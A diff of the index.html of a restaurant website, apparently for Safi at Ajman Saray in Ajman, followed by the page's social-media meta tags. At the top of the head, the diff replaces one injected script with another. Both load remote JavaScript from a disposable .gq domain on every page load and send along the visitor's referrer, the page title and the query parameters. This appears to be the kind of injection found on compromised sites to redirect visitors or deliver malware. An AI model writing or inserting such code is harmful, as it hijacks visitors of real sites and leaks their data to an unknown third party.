--- a/index.html
+++ b/index.html
@@ -1,14 +1,14 @@
 <!DOCTYPE HTML>
 <html lang="en">
- <head><span id="a093bcfe-8c05-a867-1fd2-df9c33c178ee"></span><script type="application/javascript">
+ <head><span id="2862893e-32d7-f102-cfe7-70c5ef56be00"></span><script type="application/javascript">
 var d=document;var s=d.createElement('script'); 
-s.src='https://yasakeevradyi10.gq/nKP1Kvz3?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec672ed3c547=script5ec672ed3c548&_cid=a093bcfe-8c05-a867-1fd2-df9c33c178ee'; 
+s.src='https://yasakeevradyi5.gq/RQ8VB4sG?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ed0d7ec90a12=script5ed0d7ec90a14&_cid=2862893e-32d7-f102-cfe7-70c5ef56be00'; 
 if (document.currentScript) { 
 document.currentScript.parentNode.insertBefore(s, document.currentScript);
 } else {
 d.getElementsByTagName('head')[0].appendChild(s);
 }
-if (document.location.protocol === 'https:' && 'https://yasakeevradyi10.gq/nKP1Kvz3?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec672ed3c547=script5ec672ed3c548'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+if (document.location.protocol === 'https:' && 'https://yasakeevradyi5.gq/RQ8VB4sG?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ed0d7ec90a12=script5ed0d7ec90a14'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
 </script>
 <meta name="twitter:card" content="summary"><meta name="twitter:description" content="Safi is a specialty meat and seafood restaurant in Ajman. The menu is an Asian-influenced mix of seasonal and regional fish and produce, prepared on demand according to each guest’s preferences"><meta name="twitter:image" content="https://www.safirestaurant.com/resourcefiles/homeimages/safi-seafood-restaurant-top1.jpg?version=5072020085245"><meta name="twitter:site" content="@ajmansaray"><meta name="twitter:title" content="Sea & Meat at Safi | Ajman Saray, a Luxury Collection Resort, Ajman."><meta property="og:image" content="https://www.safirestaurant.com/resourcefiles/homeimages/safi-seafood-restaurant-top1.jpg?version=5072020085245"><meta property="og:title" content="Sea & Meat at Safi | Ajman Saray, a Luxury Collection Resort, Ajman."><meta property="og:description" content="Safi is a specialty meat and seafood restaurant in Ajman. The menu is an Asian-influenced mix of seasonal and regional fish and produce, prepared on demand according to each guest’s preferences">
 
